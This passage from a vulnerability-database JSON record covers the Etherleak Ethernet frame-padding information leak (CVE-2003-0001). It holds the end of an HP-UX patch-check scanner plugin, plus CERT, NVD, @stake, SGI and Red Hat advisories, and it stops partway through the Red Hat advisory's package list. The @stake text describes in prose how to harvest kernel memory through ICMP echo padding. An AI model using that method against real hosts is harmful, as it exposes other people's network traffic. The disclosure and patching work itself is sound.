script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "HP-UX Local Security Checks", "pluginID": "17417", "cpe": ["cpe:/o:hp:hp-ux"]}

{"cve": [{"lastseen": "2018-01-17T11:54:32", "references": ["http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf", "http://www.securitytracker.com/id/1031583", "http://www.securitytracker.com/id/1040185", "http://www.atstake.com/research/advisories/2003/a010603-1.txt", "http://www.securityfocus.com/archive/1/archive/1/307564/30/26270/threaded", "http://marc.info/?l=bugtraq&m=104222046632243&w=2", "http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.html", "http://www.securityfocus.com/archive/1/archive/1/305335/30/26420/threaded", "http://www.kb.cert.org/vuls/id/412115", "http://www.redhat.com/support/errata/RHSA-2003-088.html", "http://www.redhat.com/support/errata/RHSA-2003-025.html", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"], "description": "Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.", "edition": 4, "reporter": "NVD", "published": "2003-01-17T00:00:00", "title": "CVE-2003-0001", "type": "cve", "enchantments": {"score": {"modified": "2018-01-17T11:54:32", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:2665", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2665"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-0001"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:2665", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:2665"}], "modified": "2018-01-16T21:29:00", "cpe": ["cpe:/o:netbsd:netbsd:1.5.1", "cpe:/o:microsoft:windows_2000::sp1:professional", "cpe:/o:freebsd:freebsd:4.4", "cpe:/o:linux:linux_kernel:2.4.9", "cpe:/o:microsoft:windows_2000::sp1:advanced_server", "cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:microsoft:windows_2000:::datacenter_server", "cpe:/o:linux:linux_kernel:2.4.5", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/o:netbsd:netbsd:1.5", "cpe:/o:netbsd:netbsd:1.6", "cpe:/o:freebsd:freebsd:4.3", "cpe:/o:microsoft:windows_2000::sp2:advanced_server", "cpe:/o:linux:linux_kernel:2.4.8", "cpe:/o:freebsd:freebsd:4.7", "cpe:/o:linux:linux_kernel:2.4.7", "cpe:/o:microsoft:windows_2000_terminal_services", "cpe:/o:microsoft:windows_2000::sp1:server", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:microsoft:windows_2000_terminal_services::sp2", "cpe:/o:freebsd:freebsd:4.6", "cpe:/o:microsoft:windows_2000_terminal_services::sp1", "cpe:/o:microsoft:windows_2000::sp2:server", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:netbsd:netbsd:1.5.3", "cpe:/o:linux:linux_kernel:2.4.4", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:microsoft:windows_2000::sp2:datacenter_server", "cpe:/o:microsoft:windows_2000:::advanced_server", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:microsoft:windows_2000:::professional", "cpe:/o:microsoft:windows_2000::sp1:datacenter_server", "cpe:/o:microsoft:windows_2000::sp2:professional", "cpe:/o:freebsd:freebsd:4.5", "cpe:/o:linux:linux_kernel:2.4.6", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:netbsd:netbsd:1.5.2", "cpe:/o:microsoft:windows_2000:::server", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:freebsd:freebsd:4.2"], "id": "CVE-2003-0001", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0001", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2018-08-31T02:38:30", "references": ["http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf", "http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf", "http://www.atstake.com/research/advisories/2003/a010603-1.txt", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2003-0001", "http://www.nextgenss.com/advisories/etherleak-2003.txt", "http://www.ietf.org/rfc/rfc1042.txt", "http://www.ietf.org/rfc/rfc1042.txt"], "description": "### Overview\n\nMany network device drivers reuse old frame buffer data to pad packets, resulting in an information leakage vulnerability that may allow remote attackers to harvest sensitive information from affected devices.\n\n### Description\n\nThe Ethernet standard (IEEE 802.3) specifies a minimum data field size of 46 bytes. If a higher layer protocol such as IP provides packet data that is smaller than 46 bytes, the device driver must fill the remainder of the data field with a \"pad\". For IP datagrams, [_RFC1042_](<http://www.ietf.org/rfc/rfc1042.txt>) specifies that \"the data field should be padded (with octets of zero) to meet the IEEE 802 minimum frame size requirements.\" \n\nResearchers from @Stake have discovered that, contrary to the recommendations of RFC1042, many Ethernet device drivers fail to pad frames with null bytes. Instead, these device drivers reuse previously transmitted frame data to pad frames smaller than 46 bytes. This constitutes an information leakage vulnerability that may allow remote attackers to harvest potentially sensitive information. Depending upon the implementation of an affected device driver, the leaked information may originate from dynamic kernel memory, from static system memory allocated to the device driver, or from a hardware buffer located on the network interface card. \n \nFor detailed information on this research, please read @Stake's \"EtherLeak: Ethernet frame padding information leakage\", available at \n \n[_http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf_](<http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf>) \n \nThis vulnerability may also affect link layer networking protocols other than Ethernet. \n \n--- \n \n### Impact\n\nThis vulnerability allows remote attackers to harvest potentially sensitive information from network traffic. In some network environments, this vulnerability can also be used to circumvent technologies that divide networks into separate domains, such as VLANs and routers. \n \n--- \n \n### Solution\n\n**Apply a patch from your vendor** \n \nFor vendor-specific information regarding vulnerability status and patch availability, please consult the Systems Affected section of this document \n \n--- \n \n**Use encryption to protect sensitive data**\n\n \nBy using encryption to protect network traffic, vulnerable sites can greatly reduce the impact of this vulnerability. Affected device drivers will still leak information, but fragments of encrypted information will be useless to attackers. Note that this workaround will not protect sensitive information leaked from non-network sources such as kernel memory. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nDebian Linux| | 25 Jun 2002| 25 Jul 2003 \nGuardian Digital Inc. | | 25 Jun 2002| 24 Mar 2003 \nHewlett-Packard Company| | 25 Jun 2002| 25 Jul 2003 \nIntel| | 25 Jun 2002| 21 Apr 2003 \nMandriva, Inc.| | 25 Jun 2002| 25 Jul 2003 \nNetwork Appliance| | 25 Jun 2002| 08 Jan 2003 \nRed Hat, Inc.| | 25 Jun 2002| 31 Mar 2003 \nSun Microsystems, Inc.| | 25 Jun 2002| 03 Feb 2003 \nXerox Corporation| | 25 Jun 2002| 09 Jun 2003 \nApple Computer, Inc.| | 25 Jun 2002| 10 Jan 2003 \nCheck Point| | 13 Jan 2003| 03 Sep 2013 \nClavister| | 10 Jan 2003| 16 Jan 2003 \nF5 Networks, Inc.| | 25 Jun 2002| 03 Jan 2003 \nHitachi| | 03 Jan 2003| 06 Jan 2003 \nIBM Corporation| | 25 Jun 2002| 10 Jan 2003 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23412115 Vendor Status Inquiry>). \n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf>\n * <http://www.atstake.com/research/advisories/2003/a010603-1.txt>\n * <http://www.nextgenss.com/advisories/etherleak-2003.txt>\n * <http://www.ietf.org/rfc/rfc1042.txt>\n\n### Credit\n\nThe CERT/CC thanks Ofir Arkin and Josh Anderson for their discovery and analysis of this vulnerability.\n\nThis document was written by Jeffrey P. Lanza.\n\n### Other Information\n\n * CVE IDs: [CAN-2003-0001](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2003-0001>)\n * Date Public: 06 Jan 2003\n * Date First Published: 06 Jan 2003\n * Date Last Updated: 03 Sep 2013\n * Severity Metric: 13.50\n * Document Revision: 34\n\n", "edition": 4, "reporter": "CERT", "published": "2003-01-06T00:00:00", "title": "Network device drivers reuse old frame buffer data to pad packets", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2003-0001", "CVE-2003-0001"], "modified": "2013-09-03T00:00:00", "id": "VU:412115", "href": "https://www.kb.cert.org/vuls/id/412115", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:17", "references": ["https://vulners.com/securityvulns/securityvulns:doc:4047", "https://vulners.com/securityvulns/securityvulns:doc:3969", "https://vulners.com/securityvulns/securityvulns:doc:6004", "https://vulners.com/securityvulns/securityvulns:doc:3955", "https://vulners.com/securityvulns/securityvulns:doc:9926", "https://vulners.com/securityvulns/securityvulns:doc:4676"], "description": "Incorrect memory managment causes ethernet fame padding bytes may contain sensitive information.", "edition": 1, "reporter": "VULNWATCH", "published": "2005-10-13T00:00:00", "title": "Ethernet frame padding information leakage", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:17", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "kernel", "version": "2.6", "operator": "eq"}, {"name": "kernel", "version": "2.4", "operator": "eq"}], "cvelist": ["CVE-2003-0001"], "modified": "2005-10-13T00:00:00", "id": "SECURITYVULNS:VULN:2523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2523", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:09", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n______________________________________________________________________________\r\n SGI Security Advisory\r\n\r\n Title : Some Network Drivers May Leak Data\r\n Number : 20030601-01-I\r\n Date : April 2, 2004\r\n Reference: CERT Vulnerability Note VU#412115\r\n Reference: CVE CAN-2003-0001\r\n Reference: SGI BUG 878043\r\n______________________________________________________________________________\r\n\r\nSGI provides this information freely to the SGI user community for its\r\nconsideration, interpretation, implementation and use. SGI recommends that\r\nthis information be acted upon as soon as possible.\r\n\r\nSGI provides the information in this Security Advisory on an "AS-IS" basis\r\nonly, and disclaims all warranties with respect thereto, express, implied\r\nor otherwise, including, without limitation, any warranty of merchantability\r\nor fitness for a particular purpose. In no event shall SGI be liable for\r\nany loss of profits, loss of business, loss of data or for any indirect,\r\nspecial, exemplary, incidental or consequential damages of any kind arising\r\nfrom your use of, failure to use or improper use of any of the instructions\r\nor information in this Security Advisory.\r\n______________________________________________________________________________\r\n\r\n- --------------\r\n- --- Update ---\r\n- --------------\r\n\r\nThis is an update to SGI Security Advisory 20030601-01-A:\r\nftp://patches.sgi.com/support/free/security/advisories/20030601-01-A\r\n\r\nAtStake and CERT reported a network device driver vulnerability\r\ncalled EtherLeak:\r\n\r\n http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf\r\n http://www.kb.cert.org/vuls/id/412115\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001\r\n\r\nThe gXX and tgXX gigabit network interfaces, and efXX network interface on\r\nSGI systems are not vulnerable to this issue.\r\n\r\nHowever, older SGI network interfaces are potentially vulnerable, but\r\nthey are in legacy support mode with no new fixes/patches provided.\r\n\r\nTo find out which network interfaces you have installed, run:\r\n % hinv -c network\r\n Fast Ethernet: ef1, version 1, module 2, slot io1, pci 2\r\n Integral Fast Ethernet: ef0, version 1, module 1, slot io1, pci 2\r\n\r\nIn the above example, both interfaces are efXX NICs and are not\r\nvulnerable to the EtherLeak security issue.\r\n\r\n- -----------------------------------------\r\n- --- SGI Security Information/Contacts ---\r\n- -----------------------------------------\r\n\r\nIf there are questions about this document, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\n ------oOo------\r\n\r\nSGI provides security information and patches for use by the entire SGI\r\ncommunity. This information is freely available to any person needing the\r\ninformation and is available via anonymous FTP and the Web.\r\n\r\nThe primary SGI anonymous FTP site for security advisories and patches is\r\npatches.sgi.com. Security advisories and patches are located under the URL\r\nftp://patches.sgi.com/support/free/security/\r\n\r\nThe SGI Security Headquarters Web page is accessible at the URL\r\nhttp://www.sgi.com/support/security/\r\n\r\nFor issues with the patches on the FTP sites, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\nFor assistance obtaining or working with security patches, please contact\r\nyour SGI support provider.\r\n\r\n ------oOo------\r\n\r\nSGI provides a free security mailing list service called wiretap and\r\nencourages interested parties to self-subscribe to receive (via email) all\r\nSGI Security Advisories when they are released. Subscribing to the mailing\r\nlist can be done via the Web\r\n(http://www.sgi.com/support/security/wiretap.html) or by sending email to\r\nSGI as outlined below.\r\n\r\n% mail wiretap-request@sgi.com\r\nsubscribe wiretap <YourEmailAddress such as aaanalyst@sgi.com >\r\nend\r\n^d\r\n\r\nIn the example above, <YourEmailAddress> is the email address that you wish\r\nthe mailing list information sent to. The word end must be on a separate\r\nline to indicate the end of the body of the message. The control-d (^d) is\r\nused to indicate to the mail program that you are finished composing the\r\nmail message.\r\n\r\n\r\n ------oOo------\r\n\r\nSGI provides a comprehensive customer World Wide Web site. This site is\r\nlocated at http://www.sgi.com/support/security/ .\r\n\r\n ------oOo------\r\n\r\nFor reporting *NEW* SGI security issues, email can be sent to\r\nsecurity-alert@sgi.com or contact your SGI support provider. A support\r\ncontract is not required for submitting a security report.\r\n______________________________________________________________________________\r\n This information is provided freely to all interested parties\r\n and may be redistributed provided that it is not altered in any\r\n way, SGI is appropriately credited and the document retains and\r\n includes its valid PGP signature.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n\r\niQCVAwUBQG3nJ7Q4cFApAP75AQEdAAP/Xy6DTg8QP0j+KKaEyI50JlAcKln4NQ8a\r\n/RSHcG3LBm1wTKVyfexj1t94MQbEI3K27KOhnMisBka3vmue709ZhB+29w+/K+iy\r\nB9OBjTMrtX3S6xJvQm/nc8iHM2V6kUp4jo1+J1BP1MNjQaVl2B0pSfdBdsRM9Puy\r\na/F96+7fgYg=\r\n=4VLh\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "reporter": "Securityvulns", "published": "2004-04-03T00:00:00", "title": "[Full-Disclosure] IRIX Update Some Network Drivers May Leak Data", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:09", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0001"], "modified": "2004-04-03T00:00:00", "id": "SECURITYVULNS:DOC:6004", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6004", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:06", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n @stake, Inc.\r\n www.atstake.com\r\n\r\n Security Advisory\r\n\r\nAdvisory Name: Etherleak: Ethernet frame padding information leakage\r\n Release Date: 01/06/2003\r\n Application: Ethernet device driver software\r\n Platform: Multiple\r\n Severity: Information disclosure\r\n Authors: Ofir Arkin <ofir@sys-security.com>\r\n Josh Anderson\r\nVendor Status: Multiple vendors alerted via CERT Coordination Center\r\nCVE Candidate: CAN-2003-0001\r\n Reference: www.atstake.com/research/advisories/2003/a010603-1.txt\r\n\r\n\r\nOverview:\r\n\r\nMultiple platform ethernet Network Interface Card (NIC) device\r\ndrivers incorrectly handle frame padding, allowing an attacker to\r\nview slices of previously transmitted packets or portions of kernel\r\nmemory. This vulnerability is the result of incorrect implementations\r\nof RFC requirements and poor programming practices, the combination\r\nof which results in several variations of this information leakage\r\nvulnerability.\r\n\r\nThe simplest attack using this vulnerability would be to send ICMP\r\necho messages to a machine with a vulnerable ethernet driver.\r\nPortions of kernel memory will be returned to the attacker in the\r\npadding of the reply messages. During testing we have found that\r\nthe portions returned are typically snippets of network traffic\r\nthat the vulnerable machine is handling. This attack can allow\r\nan attacker to see portions of the traffic that a router or firewall\r\nis handling on network segments the attacker has no direct access\r\ntoo. It is important to note that the attacker must be on the\r\nsame ethernet network as the vulnerable machine to receive the\r\nethernet frames.\r\n\r\n \r\nDetails:\r\n\r\n@stake has prepared a detailed report on this issue. The\r\nvulnerability is explored in its various manifestations through\r\ncode examples and packet captures.\r\n\r\nReport available at:\r\n\r\nwww.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf\r\n\r\n\r\nVendor Response:\r\n\r\nMultiple platform and hardware vendors were contacted via the CERT\r\nCoordination Center on 06/25/02. Detailed vendor response\r\ninformation is available in CERT vulnerability note VU#412115.\r\n\r\n\r\nRecommendation:\r\n\r\nContact the vendor of your ethernet device drivers or your hardware\r\nvendor for a patch.\r\n\r\nEnd to end encryption technologies such as SSL, IPSEC, and SSH\r\nshould be used when transmitting sensitive data over a network. Using\r\nencryption will help protect against this issue partly. It is not a\r\ncomplete solution because the kernel data leaked in the ethernet\r\nframe padding is not always the IP packet data portion of a\r\nprevious frame. Sometimes it is unencrypted IP header information or\r\nother kernel memory.\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information:\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe following names to these issues. These are candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\n CAN-2003-0001 Ethernet frame padding information leakage\r\n\r\n\r\n@stake Vulnerability Reporting Policy:\r\nhttp://www.atstake.com/research/policy/\r\n\r\n@stake Advisory Archive: http://www.atstake.com/research/advisories/\r\n\r\nPGP Key:\r\nhttp://www.atstake.com/research/pgp_key.asc\r\n\r\nCopyright 2003 @stake, Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0\r\n\r\niQA/AwUBPhmc+Ee9kNIfAm4yEQKyjACgnvi0ZuRUb94nfcG0zMHPzl6XdZQAn1tG\r\nTXcUNSc0uLgCvhUp0vQAu7+J\r\n=3Dtx\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2003-01-08T00:00:00", "title": "Etherleak: Ethernet frame padding information leakage (A010603-1)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:06", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0001"], "modified": "2003-01-08T00:00:00", "id": "SECURITYVULNS:DOC:3955", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3955", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:07", "references": [], "description": "---------------------------------------------------------------------\r\n Red Hat, Inc. Red Hat Security Advisory\r\n\r\nSynopsis: Updated 2.4 kernel fixes various vulnerabilities\r\nAdvisory ID: RHSA-2003:025-20\r\nIssue date: 2003-01-24\r\nUpdated on: 2003-02-03\r\nProduct: Red Hat Linux\r\nKeywords: ethernet frame padding O_DIRECT\r\nCross references: \r\nObsoletes: RHBA-2002:292\r\nCVE Names: CAN-2003-0001 CAN-2003-0018\r\n---------------------------------------------------------------------\r\n\r\n1. Topic:\r\n\r\nUpdated kernel packages for Red Hat Linux 7.1, 7.2, 7.3, and 8.0 are now\r\navailable that fix an information leak from several ethernet drivers, and\r\na file system issue.\r\n\r\n2. Relevant releases/architectures:\r\n\r\nRed Hat Linux 7.1 - athlon, i386, i586, i686\r\nRed Hat Linux 7.2 - athlon, i386, i586, i686\r\nRed Hat Linux 7.3 - athlon, i386, i586, i686\r\nRed Hat Linux 8.0 - athlon, i386, i586, i686\r\n\r\n3. Problem description:\r\n\r\nThe Linux kernel handles the basic functions of the operating system. \r\nVulnerabilities have been found in version 2.4.18 of the kernel. This\r\nadvisory deals with updates to Red Hat Linux 7.1, 7.2, 7.3, and 8.0. \r\n\r\nMultiple ethernet Network Interface Card (NIC) device drivers do not pad\r\nframes with null bytes, which allows remote attackers to obtain information\r\nfrom previous packets or kernel memory by using malformed packets. The\r\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\r\nthe name CAN-2003-0001 to this issue.\r\n\r\nA vulnerability exists in O_DIRECT handling in Linux kernels 2.4.10 and\r\nlater that can create a limited information leak where any user on the\r\nsystem with write privileges to a file system can read information from\r\nthat file system (from previously deleted files), and can create minor file\r\nsystem corruption (easily repaired by fsck). Red Hat Linux in its default\r\nconfiguration is not affected by this bug, because the ext3 file system\r\n(the default file system in Red Hat Linux 7.2 and later) does not support\r\nthe O_DIRECT feature. Of the kernels Red Hat has released, only the 2.4.18\r\nkernels have this bug. The Common Vulnerabilities and Exposures project\r\n(cve.mitre.org) has assigned the name CAN-2003-0018 to this issue.\r\n\r\nUsers of the ext2 file system can migrate to the ext3 file system\r\nusing the tune2fs program as described in the white paper at\r\nhttp://www.redhat.com/support/wpapers/redhat/ext3/\r\n\r\nAll users of Red Hat Linux 7.1, 7.2, 7.3, and 8.0 should upgrade\r\nto these errata packages, which contain patches to ethernet drivers to\r\nremove the information leak and a patch to fix O_DIRECT handling.\r\n\r\nIn addition, the following drivers are upgraded to support newer hardware:\r\n3c59x, e100, e1000, tg3\r\n\r\n4. Solution:\r\n\r\nBefore applying this update, make sure all previously released errata\r\nrelevant to your system have been applied, especially the additional\r\npackages from RHSA-2002:205 and RHSA-2002:206 respectively.\r\n\r\nThe procedure for upgrading the kernel manually is documented at:\r\n\r\nhttp://www.redhat.com/support/docs/howto/kernel-upgrade/\r\n\r\nPlease read the directions for your architecture carefully before\r\nproceeding with the kernel upgrade.\r\n\r\nPlease note that this update is also available via Red Hat Network. Many\r\npeople find this to be an easier way to apply updates. To use Red Hat\r\nNetwork, launch the Red Hat Update Agent with the following command:\r\n\r\nup2date\r\n\r\nThis will start an interactive process that will result in the appropriate\r\nRPMs being upgraded on your system. Note that you need to select the kernel\r\nexplicitly on default configurations of up2date.\r\n\r\n5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):\r\n\r\n76159 - Errata kernel 2.4.18-17.8.0 fails PCI resource allocation\r\n\r\n6. RPMs required:\r\n\r\nRed Hat Linux 7.1:\r\n\r\nSRPMS:\r\nftp://updates.redhat.com/7.1/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n\r\nathlon:\r\nftp://updates.redhat.com/7.1/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nftp://updates.redhat.com/7.1/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n\r\ni386:\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n\r\ni586:\r\nftp://updates.redhat.com/7.1/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\nftp://updates.redhat.com/7.1/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\n\r\ni686:\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\n\r\nRed Hat Linux 7.2:\r\n\r\nSRPMS:\r\nftp://updates.redhat.com/7.2/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n\r\nathlon:\r\nftp://updates.redhat.com/7.2/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nftp://updates.redhat.com/7.2/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n\r\ni386:\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n\r\ni586:\r\nftp://updates.redhat.com/7.2/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\nftp://updates.redhat.com/7.2/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\n\r\ni686:\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\n\r\nRed Hat Linux 